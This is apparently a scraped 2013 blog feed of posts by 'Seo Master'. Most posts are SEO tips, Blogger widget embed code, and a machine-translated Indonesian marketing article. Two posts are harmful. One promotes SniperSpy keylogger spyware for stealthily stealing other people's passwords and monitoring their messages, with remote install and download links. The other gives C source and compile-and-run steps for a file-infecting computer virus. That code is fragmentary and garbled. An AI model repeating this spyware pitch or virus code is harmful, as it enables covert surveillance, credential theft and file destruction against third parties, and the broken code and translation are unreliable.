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seo 2013

Seo Master present to you:
3 Cara Promosi Bisa Meningkatkan Social Media Strategi Pemasaran Anda-Sosial media telah menjadi pemasaran kendaraan masuk ke bagi perusahaan yang ingin membangkitkan minat , percakapan dan meningkatkan keterlibatan konsumen dengan merek mereka. Demikian juga, di Steel City Pemasaran , kami telah menginvestasikan waktu dan uang untuk membuat ini bagian dari upaya pemasaran kami. Kami senang berkomunikasi dengan klien yang sudah ada maupun calon di Twitter, Facebook, Google+ dan menggunakan banyak alat-alat online yang tersedia untuk terhubung dengan mereka. Namun, kita masih percaya bahwa media sosial belum membuat bentuk-bentuk pemasaran tradisional berlebihan, jadi kami memfokuskan upaya kami untuk menciptakan strategi yang kohesif. The promosi industri hadiah merupakan sektor ceruk dunia pemasaran tetapi penting bahwa kami bergerak ke depan dengan tren yang berlaku. Kami membantu klien kami untuk menggunakan manfaat unik hadiah promosi menawarkan untuk meningkatkan kampanye media sosial mereka.

Berulang, klien bertanya "apa ROI dapat memberikan hadiah promosi?" - Sebuah pertanyaan yang sama umum untuk strategi media sosial. Statistik menunjukkan bahwa hadiah promosi sebenarnya bisa memberikan ROI yang lebih tinggi atau sama daripada kebanyakan bentuk lain dari iklan. Jadi bagaimana Anda menggunakan ini untuk meningkatkan strategi media sosial Anda? Dalam sebuah studi nasional terbaru oleh BPMA , beberapa fakta menarik khususnya menonjol:

"87% dari penerima menyatakan mereka telah menyimpan hadiah promosi selama lebih dari satu tahun"

"84% responden setuju bahwa hadiah promosi bermerek meningkatkan kesadaran merek dengan 66% mengatakan mereka bisa mengingat merek dicetak produk dari tahun sebelumnya"

"79% dikonfirmasi mereka cenderung melakukan bisnis dengan perusahaan itu di masa depan"
Hal ini menunjukkan bahwa hadiah promosi berlangsung lebih lama dari tweet atau status. Mereka beton, memiliki utilitas dan merupakan alat pemasaran yang kurang sekali pakai daripada banyak berasumsi. Anda dapat menggunakan umur panjang mereka menawarkan kampanye merek Anda untuk meningkatkan lalu lintas ke, dan kesadaran, upaya media sosial Anda. Baca terus untuk kami atas tiga tips.

1. QR Codes 
Kode QR adalah bar code secara visual yang dapat dicetak ke berbagai macam bahan. Untuk membaca kode QR Anda perlu men-download sebuah aplikasi untuk ponsel pintar modern. Aplikasi ini digunakan untuk memindai kode yang mengirim pengguna langsung ke situs, halaman web media sosial atau blog.

Kode-kode bagus dengan mudah dapat dicetak untuk barang-barang promosi pilihan Anda. Anda tidak dibatasi oleh bahan produk dan hadiah populer termasuk pena, catatan tempel, dan mug. Mencetak ke sebuah item dengan lebih utilitas, sebagai lawan selebaran, akan meningkatkan umur panjang QR code Anda.
Insentif penerima Anda dengan menggunakan kode QR untuk mengarahkan mereka ke kompetisi. Hal ini akan meningkatkan keterlibatan pengguna dengan perusahaan Anda dan lalu lintas ke halaman yang Anda inginkan.
Steel City Pemasaran dapat menghasilkan pribadi sendiri kode QR Anda untuk apa pun situs atau halaman web yang Anda inginkan.
2. Hashtag Kampanye

Hashtags adalah cara untuk melacak topik atau tren di media sosial. Mereka dipopulerkan oleh Twitter, tetapi juga dapat digunakan di Google+ dan Instagram. Seorang pengguna dapat mengklik pada kata-kata atau frasa didahului dengan tanda # untuk melihat apa yang dikatakan pengguna lain tentang hal itu. Mereka adalah cara yang fantastis untuk memantau siapa yang langsung terlibat dengan merek Anda.

Merancang hashtags inventif untuk menciptakan buzz di sekitar perusahaan atau kampanye. Puns dan frase lucu bekerja sangat baik, tetap ringan, segar dan 'sosial'.
Hashtags juga berguna untuk acara, peluncuran produk dan konferensi. Gunakan mereka dalam minggu-minggu sebelumnya untuk menginformasikan orang-orang tentang tanggal dan speaker line-up, kemudian pada hari untuk menyiarkan debat tren.
Promosikan hashtag dengan mencetak ke pilihan barang-barang promosi. Ini dapat digunakan dalam surat-out atau sebagai hadiah pada acara atau konferensi, menawarkan pengingat visual untuk klien untuk terlibat.
3. Promosikan Staf Penjualan Anda

Sosial media memungkinkan Anda untuk memberikan muka dengan merek Anda, yang merupakan cara untuk memanusiakan eksekutif penjualan Anda, yang dulunya hanya suara tak berwajah di telepon. Orang-orang secara alami cenderung untuk merespon lebih baik untuk orang-orang yang mereka telah mengembangkan koneksi dengan. Gunakan ini untuk mengembangkan hubungan pribadi dengan klien dan pada gilirannya, meningkatkan kemungkinan mereka akan terus berinvestasi pada merek Anda.

Buat individu staf Anda bekerja Twitter dan account Google+ dan bahkan mempertimbangkan termasuk mereka sebagai administrator pada halaman Facebook Anda. Ini adalah metode tambahan untuk tetap berhubungan dengan klien yang memiliki jadwal sibuk, dan memastikan bahwa Anda selalu yang pertama di tangan untuk menawarkan layanan Anda bila diperlukan. Jaminan bahwa klien yang menyadari hal ini layanan 'gratis' dengan memasukkan media sosial menangani pada kartu nama dicetak dan tanda tangan email.
Melacak permintaan pencarian yang relevan dengan menggunakan Twilerts dan Google Alerts untuk mencari klien baru berbicara tentang pasar Anda. Eksekutif penjualan dapat menghubungi mereka melalui profil mereka dan mengurangi kebutuhan untuk panggilan dingin.
Bekerja ekstra dan mengirimkan barang-barang promosi pribadi kepada klien yang potensial dan yang sudah ada. Meningkatkan keterlibatan dengan memilih item yang relevan dengan bisnis mereka. Sebagai contoh, kami telah mengirim keluar mobil berbentuk mainan stres mekanik, permen untuk organisasi sekolah dan bibir balm untuk kecantikan.
2013, By: Seo Master

seo Interesting Facebook shortcuts and tricks to browse Facebook easily 2013

Seo Master present to you:
In this post we will share some awesome interesting Facebook shortcuts which could make your social networking life more comfortable. 

You can use Facebook by using many easy shortcuts. Below we are posting the shortcuts for 2 popular web browser Mozilla and Google Chrome.

If you are a Google Chrome user then Follow the following Shortcuts: 

Google Chrome SHortcuts Keys for Facebook : 

New message = Alt+m
Home page = Alt+1
Profile page = Alt + 2
Friends list management = Alt + 3
All the message list = Alt + 4
List of notification = Alt + 5
Account setting page = Alt + 6
Privacy setting page = Alt + 7
Visit Facebook Fan page = Alt + 8
Facebook Policy Page = Alt+ 9

If you are a Mozilla Firefox user then Follow the following Shortcuts: 
You just need to add shift before all the shortcut key used for Google Chrome.

New message = shift+Alt+m
Home page =  shift+Alt+1
Profile page = shift+Alt + 2
Friends list management =  shift+Alt + 3
All the message list = shift+Alt + 4
List of notification = shift+Alt + 5
Account setting page = shift+Alt + 6
Privacy setting page = shift+Alt + 7
Visit Facebook Fan page = shift+Alt + 8
Facebook Policy Page = shift+Alt+ 9

You must be logged in Facebook and stay in the Facebook tab of your browser to use the shortcuts. Cool! isn't it? Just go to your Facebook account and give a try! I like the "New message" shortcut most.
2013, By: Seo Master

seo Top 5 Professional Free WordPress Themes 2013 2013

Seo Master present to you:
WordPress; WordPress is a free Blogging Tool,and CMS(Content Management System).WordPress use PHP and MySQL Languages for editing,modifying or installing Plugins.Creating WordPress website is not difficult,but finding a beautiful theme for WordPress Blog is lil bit hard work.So in this regard we have collected Top 5 Professional Free WordPress Themes which will surely solve your Problem of finding and wasting time on Finding Themes for WordPress Blogs.Actually theme is soul of your blog,it will reflect your personality and your blog personality.

Features of Top 5 Professional Free WordPress Themes 2013

  • Professional Look
  • Ads Ready,SEO Ready
  • Right,Left Sidebars
  • Top Navigation menus
  • Simple and Clean
  • Custom Headers 
  • Custom Backgrounds
  • Automatic Feed Links
  • Work With All Browsers i.e Google Chrome, Mozilla and Firefox

Top 5 Professional Free WordPress Themes 2013

Finding Professional Themes for WordPress is very hard,but when Quality is your First Priority,then you have to find the awesome theme for your WordPress Blog.So here is Top 5 Professional Themes,i hope you will found it interesting.

1# Rusty Grunge Professional WordPress Theme

2# CryBook Professional WordPress Theme

CryBook WordPress Themes has 3 Columns Layout,it has 2 right sidebars along with many other widgets.Its look is like Facebook which makes it more attractive Template.

3# Max Professional WordPress Theme


4# Blog Theme Professional WordPress Theme


5# Androida Professional WordPress Theme

So What's Up :- Did You Like These WordPress Themes? Which One was the most Beautiful ? Your Favorite One? Any New Template You Want? Pass your views,and share your ideas with us :) , stay Blessed,Happy Blogging .
Top 5 Professional Free WordPress Themes 2013
Last Reviewed by Iftikhar uddinon June 24 2013
Rating: 5
2013, By: Seo Master

seo How to increase the Google page rank of your Blog very quickly - Importance of Page rank 2013

Seo Master present to you:

What is Google & Alexa Page rank?

Google Page rank is the ranking system by Google where a website or blog is rated from 0-10. The better the website the higher the page rank will be. That means everyone will give priority to the website which has higher page rank. For example:Hubpages has a Google page rank of 5 and Facebook has a Google page rank of 10.
On the other hand Alexa is a website ranking company which ranks website by ranking all the site in their list. So the best site gets the number 1 rank. The bigger the number will be the worst the website is. Google is the number 1 ranked site in Alexa and Facebook is at number 2. Hubpages Alexa rank is 330

How to check Google Page rank:The official site to check Google PR is Prchecker.info. But I don't use this site to check Google page rank. I will recommend to use this site instead - Click hereIf you use this site then you can save a lot of time because it will not need "Human Word verification" again and again.

Why Google Page rank is very important: Google Page rank is very important for your blog/site. A blog with higher page rank means the blog is very Google friendly. The do-follow links from a high page ranked blog/site has higher ability to influence other site page rank. That means everybody wants back-links from higher page ranked Blog. Higher page rank also determines the quality of your site. That is the why a site/ Blog with High Pr can get approval for any kind of affiliate program or advertising networks. You can also earn money by including links or writing reviews of other site in your blog.

Source: My Blog

How to Increase Google page rank very quickly: My current blog is about computer tips and tricks. I created this blog 3-4 months ago and recently the blog has been promoted to PR 1. I know that having a PR1 blog is not a big deal but for a beginner blogger this is pretty cool. Now I am going to tell you the steps to increase page rank very quickly:

1. Submit you blog to main search engine directories: At first submit your blog to different search engine directories like Googleyahoo and bing. You can just open this link in a new window and submit your blog.
2. Fresh quality content: Fresh quality content is the best and most important thing to get high traffic and good Page rank. Do not use duplicate content in your blog. Unique contents get ranked in search engine very quickly which helps to get traffic and page rank both at a time.
3. Update daily: try to post at least 1 blog everyday. The more posts do you the better it will be for you to get traffic and good page rank.
4. Back links: Try to get Good Do-follow back Lions. Do not try to get Automatic back-links from different sites. Most of the these sites provides dead back-Links which does not help in increasing page ranks. Recently Google has Penalized those sites which uses irrelevant dead back-links for increasing Page rank.
5. SEO research: You need to reserach for while before writing any kind of articles. Use this Adword keyword tool to find the best keywords and phrases for your article. Try to use more than 3+ words to find the perfect phrase. While researching look at the competition and monthly views. Try to pick a phrase which is having the lowest competition and high monthly views. If you do a SEO research then your articles will be well ranked. The more good articles you will have the better traffic and page rank will be.
6. Add your blog to good blog/link directories: You must submit your blog to some good blog directories. Some of the best directories are Technorati Dmozetc. This 2 are most powerful blog directories and can influence a lot in your page rank.
7. Pinging: Make sure you site/blog is having a auto pinging system so that you contents can be ranked very quickly in search engine. You can also try other pinging website for getting additional exposures. (Note: Do not Ping again and again. Search engine can penalize you if you do so.)
8. Social bookmarking : You must book mark you contents to as many Bookmarking site as possible. Social bookmarking works as a back-linking also brings lot of traffic if it gets popular. Some of the Popular social Bookmarking site are :
* Reddit
* Digg
* Delicious
* Stumble upon
* Google Buzz
* Mix
* She told me
* Redgage
9. Use RSS feed Burner: You can use Rss feed burner to get regular readers. Whenever you post any new article your readers will be notified through feed. This helps to bring traffic consistently and thus it also influences your page rank.

I guess all of these tips will help you to increase your page rank. Thank you for reading the Hub :)

2013, By: Seo Master

seo Create Your Own Domain Free 2013

Seo Master present to you:

Click This link Dot.TK and join . Create a domain and save it. click home button , you will see a link named go to domains You will reach domain panel , click modify . Select domain forwarding option and enter your available website/blog address& save it.


Just click “www.yourname.tk” address, it will re-direct to your website.

and Click modify button Here, you will get Pop up window of Domain settings. Select Dot TK DNS Serviceand configure your DNS settings like below shown screenshot according to your domain name i.e. replace entertainer001.tk with your dot tk domain and keep all the remaining options same. Configurations methods are clearly explored in below image.

Add the host names with ip address to A-records like:

Here host name field is your Dot Tk Domain without WWW. Set CNAME records ip toghs.google.com and host name field to your Dot Tk Domain with WWW.
Log on to your blogger account.

Go to Settings and open Publishing tab in your dashboard. Now click on Custom Domain and then Switch to advanced settings.
Enter your Dot Tk domain with www. Then save your settings.

Note that changes will be appeared within 30 minutes. So be patient and check back your domain later.

2013, By: Seo Master

seo Best SEO learning article # 1 2013

Seo Master present to you:

May be you are an expert in SEO. We are not the expert of SEO. Here Technology Bangladesh going to share some tips which you must need to know before SEO. There are two kinds of SEO. One is off page SEO another on page SEO. Both SEO systems are very important. We suggest you to forget off page and on page SEO. Just follow our system and get the result. We only believe on result. We will share both systems here. But Technology Bangladesh think there is no need to be an expert for SEO. Simply try to learn bellow steps and try to examine your site and see yourself the result. Just see bellow method of SEO which you need when SEO for any site.

Use Social Site:

To get lots of traffic everyday and backlink for your site you must use Social Site. There are hundred of social media around the world. Among them facebook, twitter, pinterest, linkedin, google+ is best and more than 80% of traffic will come from here if you use them appropriately.

Find Here: Best SEO learning article # 2 (Use Social Site)
Find More Here: Best SEO learning article # 3 (Top 21 Do Follow Social Bookmark Site 2013)

Link Building

Link–building are necessary for you to get your site at the first page of the search result.
Bookmark Your Sites in many books marking site. We will post another article very soon about link building.

Post SEO Related Article:

Try to write SEO related article but in part. That’s mean divide your article into many part and then post one by one. Once a visitor like any part of your chain post he must come back to read the next part. What do you think? I am right or not? Anyway, if you are not too expert to write SEO related article you can hire any contractor from oDeskor others freelance market place.

Keep on eye to your content:

Always keep on eye to your content. It must be out of copy paste. Try to check copy scape of each article from here. Keep in mind, unique article is the heart of your blog. You may say unique content is the window of blog. Every search engine gives priority of unique article. Besides, copy paste article has no value to search engine as well as the add network.

Maintain posting:

Make post as much as unique article possible everyday so that, visitors can understand the progress of your site. If not possible try to post at least 3 to 7 unique article in a week. Make sure the quality not only the quantity. Never gap more than a week to post any article. Try to give high priority on this topic when you are a professional blogger.

Keep Eye on Design or Layout:

Keep eye on design and layout so that visitors like your site or blog. Visitors find best content, unique and helpful articles as well as design and menu. If you are unable to develop please hire some one who is professional to design a website. Let me have an example: (Technology Bangladesh & Preetech3 is same site with same content. Avow Bd is looks good and easy to navigate on the other hand Technology Bangladesh is looks not so good and hard to navigate. Now tell me which one you would live to visit?)

Search Engines Submissions:

There has a lot of search engine around the world. Try to submit your site all of them. If possible do it once a month. You may know the best search engine name. This is a big issue and broad article that’s why we make a separate post on it. See

Directories and Forum:

There are thousand of directories and forum around the world. Some of them are free and some of not free. Keep on eye the page rank of them when you use directories and forum. Yu have to register first then you can list your site and article. Technology Bangladesh will make another post on it.

Use free Traffic Generation Site:

There are many sites that are providing lots of traffic everyday. You can get that very easily. We recommend you to use profitclicking. As here we discuss about another topic so we will give another post on it.

Guest blogging:

As you are a professional blogger so try to join any site which allows guest posting. After register make an article and use your site address at the source. Once any reader read your article he or she must visit your site also. This way you will get huge visitors of your site. On the other hand, if you offer guest posting at your site it will be best for traffic and link building both. Now decision is you’re which one you chose for you.

Ping URL regularly:

Pinging URL will help you to link building as well as indexing very shortly into search engine. That’s way we have to ping website URL at least once in a week if it is hard to you then try to do once in a month.

You may ask what is ping and how to do it? Doesn’t worried we already post a separate on it. Find
Best SEO learning article # 4 (Ping URL regularly) for details.

Create link wheel:

You must have to create link wheel to get permanent back link and visitors. If you know about this method let’s start right now and if don’t know just wait. Technology Bangladesh will make a separate post on it soon.


Simply visit various sites which have high page rank. Make sure the site must be do follow. If no follow you can’t get the benefit. However, make a good comment on any article. Remember, when making comment for any post must read the full post then make comment. By make comment you will get permanent backlink and visitors. We think this is the best and easy way to make backlink and traffic.

After all, we suggest you to emphasize on article. If you don’t have unique article SEO will not be effective for your site. Here we give a short description of all method of SEO. We will make different post for each method very shortly. Thank you Technology Bangladesh.
2013, By: Seo Master

seo Yahoo Buzz Button For Blogger 2013

Seo Master present to you:



Yahoo Buzz is a community-based news article website, just like Digg, that combines the features of social bookmarking and syndication through a user interface that allows editorial control.
Yahoo Buzz has got many different
sharing buttons.
Integrating this into blogger will require some template edits.
This post explains how to add Yahoo! Buzz buttons on your every Blogger post. It's really very simple!

To add this widget to your blog, follow these instructions:


Step 1:
Log in to Blogger, go to Design / Layout > Edit HTML and tick the "Expand Widget Templates" checkbox.

Step 2:
Now find (CTRL+F) this in the code:


Square Button:
Case 1:
Top Right
To place the yahoo buzz button with counter at the top right corner of your post paste this code before/above it :

<div style="float:right;padding:4px;">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="square"><data:post.url/></script>

NOTE: Don't forget to save the template.
NOTE: To change the button position from "Top-Right" to "Top-Left" just change the float position to left. i.e. float:right changes to float:left check it in Case 2 below.
Case 2:
Top Left
To place the yahoo buzz button with counter at the top left corner of your post paste this code before/above it :

<div style="float:left;padding:4px;">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="square"><data:post.url/></script>

NOTE: Don't forget to save the template.
NOTE: Browse more buttons from here grab the code and replace ARTICLEURL with<data:post.url/>.
NOTE: To place the yahoo buzz button at the end of your post paste this codeafter/below it.
NOTE: You can also include the first and last line of to place the button left or right.
<div style="float:left;padding:4px;">
code here
This will put a Yahoo Buzz Button to every post. But It won't let you choose which post you want to include or exclude a button.

2013, By: Seo Master

seo Add Orkut Share Button to blogger posts 2013

Seo Master present to you:

Orkut has recently released orkut Share API for its users. Orkut users can now share and promote interesting content from the Internet with their orkut friends easily with just few clicks. The shared content will appear in their activity updates.
Most of the bloggers and webmasters use Facebook share option to share and promote their content on
Facebook. Its one of the best methods to promote their content. It seems Orkut is following Facebook in looks and in features too.


To add this button go to Layout > Edit HTML and click on Expand Widget templates, copy and paste the following code above </head>

<!--orkut share starts here-->
<script src='http://www.google.com/jsapi' type='text/javascript'/>
<script type='text/javascript'>
google.load(&#39;orkut.share&#39;, &#39;1&#39;);
google.setOnLoadCallback(function() {
var params = {};
params[google.orkut.share.Field.TITLE] = &#39;<data:blog.pageName/>&#39;;
params[google.orkut.share.Field.DESTINATION_URL] = &#39;<data:blog.url/>&#39;;
var connection = new google.orkut.share.Connection(params);
document.getElementById(&#39;orkut-share&#39;).onclick =
function(e) { connection.send(&#39;orkut.com&#39;, {}); };
}, true);
<!--orkut share end-->
Now search for the <data:post.body/> tag in your template and add the below code after this tag :
<b:if cond='data:blog.pageType == "item"'>
<span id="orkut-share" style="cursor:pointer; border:1px solid black">
<img src="http://code.google.com/apis/orkut/docs/images/share.gif"/>
If you dont find<data:post.body/> then search for <div class='post-header-line-1'> and paste the above code below this tag.
That’s all. Save your template and see the changes. If you face any problems please do add comments.

2013, By: Seo Master

seo Add WordPress Style Menu Tabs Widget To Blogger! 2013

Seo Master present to you:


The widgets on a Wordpress Blogs surely are well designed and coded but they look even better when they are bloggerized and made compatible to work in Blogger.  Last year we created Advanced Multi Tabbed Widget that was well appreciated by everyone and today we have yet another but far improved multi tabbed widget. The best thing about this widget is that you can add as many widgets as you want inside a single Tab which you could not do previously. Beautiful CSS and Jquery effects are added this time to the tab views and I have tried again to make its installation as easy as possible. So do not delay any further and learn how to add a professional looking tabber widget to your free Blogger blogs.


How To Add this Multi Tabbed Widget To Blogger?

I have divided the tutorial in three parts which are,

  1. Adding the JQuery and JavaScript to your Blogger templates
  2. Adding the CSS
  3. Adding the HTML

1- Adding the JQuery and JavaScript to your Blogger templates
  1. Go To Blogger > Design > Edit HTML
  2. Backup your template
  3. Search for ]]></b:skin>
  4. Just below it paste the following code –> MBT Menu Tabs JavaScript
  5. Save your template
  6. Done!
2- Adding the CSS
  1. Inside your template search for ]]></b:skin> again
  2. Just above it paste the code below,

/*---- Wordpress Style MBT Menu Tabs----*/

.MBT-tabs{list-style:none;list-style-type:none;margin:0 0 10px 0;padding:0;height:26px}
.MBT-tabs li{list-style:none;list-style-type:none;margin:0 0 0 4px;padding:0;float:left}
.MBT-tabs li:first-child{margin:0}
.MBT-tabs li a{color:#fff;background:#333333;padding:5px 5px;display:block;text-decoration:none;font:bold 12px Arial,Helvetica,Sans-serif;}
.MBT-tabs li a:hover,.MBT-tabs li a.MBT-tabs-current{background:#A46F38;color:#fff;text-decoration:none}

Simply replace #A46F38 with the HexaDecimal Colour code of your template so that the tabs may blend perfectly into your template.

3- Adding the HTML
  1. Now Search for <div id='sidebar-wrapper'>
  2. Make sure the widgets box is unchecked.
  3. Just below <div id='sidebar-wrapper'> paste the code below,

<div class='MBT-tabviewsection'>

<script type='text/javascript'>
                $(&quot;ul.MBT-tabs-widget-MBT-id li:first a&quot;).addClass(&quot;MBT-tabs-current&quot;).show();
                $(&quot;ul.MBT-tabs-widget-MBT-id li a&quot;).click(function() {
                    $(&quot;ul.MBT-tabs-widget-MBT-id li a&quot;).removeClass(&quot;MBT-tabs-current a&quot;);
                    var activeTab = $(this).attr(&quot;href&quot;);
                    return false;

<ul class='MBT-tabs MBT-tabs-widget-MBT-id'>
<li><a href='#widget-MBT-id1'>Subscribe</a></li>
<li><a href='#widget-MBT-id2'>Latest Tricks</a></li>
<li><a href='#widget-MBT-id3'>Search</a></li>

<div class='MBT-tabs-content MBT-tabs-content-widget-MBT-id' id='widget-MBT-id1'>
<b:section class='sidebar' id='sidebartab1' preferred='yes'>

<div style='clear:both;'/>                      
<div class='MBT-tabs-content MBT-tabs-content-widget-MBT-id' id='widget-MBT-id2'>
<b:section class='sidebar' id='sidebartab2' preferred='yes'>

<div style='clear:both;'/>
<div class='MBT-tabs-content MBT-tabs-content-widget-MBT-id' id='widget-MBT-id3'>
<b:section class='sidebar' id='sidebartab3' preferred='yes'>

<div style='clear:both;'/>

Please Replace Subscribe, Latest Tricks and Search with your Widget Titles that you will be adding.

   4.  Now Go To Page Elements. You will see something like this,

Blogger-Page-Elements Menu tabs

Start adding your widgets and after you have added all your widgets then simply view your blog to see it in action. Done! :-)

2013, By: Seo Master

seo Add Facebook Like and Send Button To Blogger Blogs 2013

Seo Master present to you:


recently Facebook combined the Like and send button into a single plugin, making it more easy to add both the buttons with a single code. Further the like button is equipped with an additional comment functionality i.e. The visitors can comment on what they liked just under the button. Lets add this beautiful plugin to blogger.


Add The Facebook Like and Send Button To Blogger


  1. Go To Blogger > Design > Edit HTML

  2. Backup your template

  3. Click Expand widgets templates box

  4. Search for <data:post.body/>

  5. and now if you wish to add the plugin just below your post titles then add the giant code below just above <data:post.body/> or if you wish that the plugin may appear at the end of your posts then paste the following code just below <data:post.body/>

<div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="450" show_faces="false" font=""></fb:like>

  6.  Hit save and you are done!

2013, By: Seo Master

seo Add LinkedIn Share Counter Buttons To Blogger 2013

Seo Master present to you:


LinkedIn is a social networking site for business purposes. It is counted amongst the top 30 websites. It was founded in 2002 and today it has around 100 Million active users. This counter is often not added by bloggers and is often under estimated but with LinkedIn's 47.6 Million monthly unique  visitors, make sure you are not missing a great blog and web Traffic source. To add LinkedIn counters to your blogger or blogspot blogs, kindly follow the steps below,




Add LinkedIn Share Count Buttons  To Your Blogs


  1. Go To Blogger > Design > Edit HTML

  2. Backup your template

  3. Click "Expand widget templates" box

  4. Search for this,


To add the counter just below post titles then add anyone of the following codes above the code in Step#4 and if you wish to add the counter button to the bottom of posts then add any of the given codes below just below the code in step#4

Vertical CountLinkedIn vertical Count button

<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
<script type="IN/Share" data-counter="top"></script>

Horizontal Count

LinkedIn horizontal button

<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>

No Count

LinkedIn button

<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
<script type="IN/Share"></script>

   5. Save your templates and you are done!

View your blogs to see it hanging. Have Fun! :)

2013, By: Seo Master

seo Password hacking - USING KEYLOGGERS 2013

Seo Master present to you:


The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware.   If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.


Easily Access any Email



With SniperSpy, you can gain access to any password protected material such as Facebook, MySpace or any other email account.


SniperSpy has a Remote Install feature using which it makes it possible to install this software on a remote computer. This feature can be very handy when you do not have physical access to the target computer on which you want to install this software.

3. MONITOR EVERY ACTIVITY on the Target Computer

With SniperSpy, you can not only capture the passwords, but also spy on their IM conversations and take screenshots of the activities on the target computer.


Since SniperSpy runs in a complete stealth mode, it’s presence on the target computer remains undetected. So you need not worry about being caught or traced back.

5. Extremely EASY TO USE

Since SniperSpy is designed for novice computer users, it requires no special skills to install and use.

6. Works on Both PC and MAC

SniperSpy is fully compatible with Windows 2000/XP/Vista/7 and Mac.

Can I Install SniperSpy on a Local Computer?

Yes, you can install SniperSpy on a Local or Remote computer. It supports both Remote and Local installations. So, you need not worry whether it is a local or a remote computer.

How Safe is to Use SniperSpy?

SniperSpy is completely safe and secure since it neither collects any information from your computer nor contact you in any way.

So, what are you waiting for? Go, grab it now and expose the truth!

Click Here to Download SniperSpy for Windows

Click Here to Download SniperSpy for Mac





Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

2013, By: Seo Master

seo How to Create a Computer Virus? 2013

Seo Master present to you:


This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.



FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
if(host==NULL) goto next;
printf(“Infecting %s\n”,ffblk.ff_name,a);
printf(“DONE! (Total Files Infected= %d)”,a);
printf(“TIME TAKEN=%f SEC\n”,






1. Load the program in the compiler, press Alt-F9 to compile


3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect


1. Open new empty folder


3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it


2013, By: Seo Master

seo 新增!Novo! Новинка! ¡Nuevo! 新しい! 2013

Seo Master present to you:

Developers speak lots of languages, not just English and C++. We know that you use Google Code from all over the world, and we understand that the love of a good API is universal.

We're excited to announce that developer content on Google Code is now available in five new languages: Chinese, Japanese, Portuguese, Russian, and Spanish. Many of our pages, such as the site directory and landing pages for the various APIs have already been translated. You will also find that some of the deeper technical documentation, such as the Chart API and Maps API, has also been translated where appropriate. Where we haven't translated the content yet, you will continue to see the English version of the site.

We'll be working to keeping this content up-to-date, and we're looking forward to adding more support for languages and APIs throughout the year.

Update: Corrected to read "in five new languages." The sixth language, of course, is English.

2013, By: Seo Master

seo How to Add A Comment Count Bubble To Blogger Post Titles 2013

Seo Master present to you: A comment bubble with current number of comments displayed to each blogger post titles could make your blog more attractive. This improves not only your comments count but also allows your visitors to see what are the most popular posts on your blog. When a post has many comments, then the comment bubble will show the popularity of your posts to readers and visitors so that they might be more interested in reading them.

So let's start adding it:

Step 1. Go to Dashboard - Template - Edit HTML (click on Proceed button, if needed)

Step 2. Select "Expand Widget Template" (make a backup)

    Step 3. Find - using CTRL + F - the following piece of code in your template:


    Step 4. Add the below code just above ]]></b:skin>:

    .comment-bubble {
    float : right;
    width : 48px;
    height : 48px;
    background : url(http://www.matrixar.com/-7FFIKA34Kvw/T4x9E0RmA0I/AAAAAAAAALI/03AG305CesI/s1600/speech+bubble+green.png);
    background-repeat: no-repeat;
    font-size : 18px;
    margin-top : -15px;
    margin-right : 2px;
    text-align : center;

    Step 5. Now find this code:

    <b:if cond='data:post.title'>
    <h3 class='post-title entry-title'>

    Note: If you can't find it, search this code instead:

    <b:if cond='data:post.title'>
          <h3 class='post-title entry-title' itemprop='name'>

    Step 6. And add this code immediately after it:

    <b:if cond='data:post.allowComments'>
    <a class='comment-bubble' expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick' style='color: #ffffff; font-size: 18px; font-weight: bold;'><data:post.numComments/></a>

    • to change the color of the comments number, replace #ffffff with the hex value of your color;
    • to change the font size, increase/decrease the 18px value;

    Step 7. Preview your template and if everything is ok, click on Save Template.

    Comment Bubbles 

    You can choose one of the images below - right click on the desired image and select "Copy Image Address/Location", then replace the red code from step 3 with the address you just copied.

    bubble comment count, bubble blogger postsblogger comments, comment countblogger blogspot, blogger commentsblogger bubble comment countcomments in blogger titlesblogger tips, blogger tricksblogger widgets, bubble comment countbubble comment countBubble Comment CountBubble Comment Count, blogger blogspot

    That's it! Enjoy (:

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    2013, By: Seo Master
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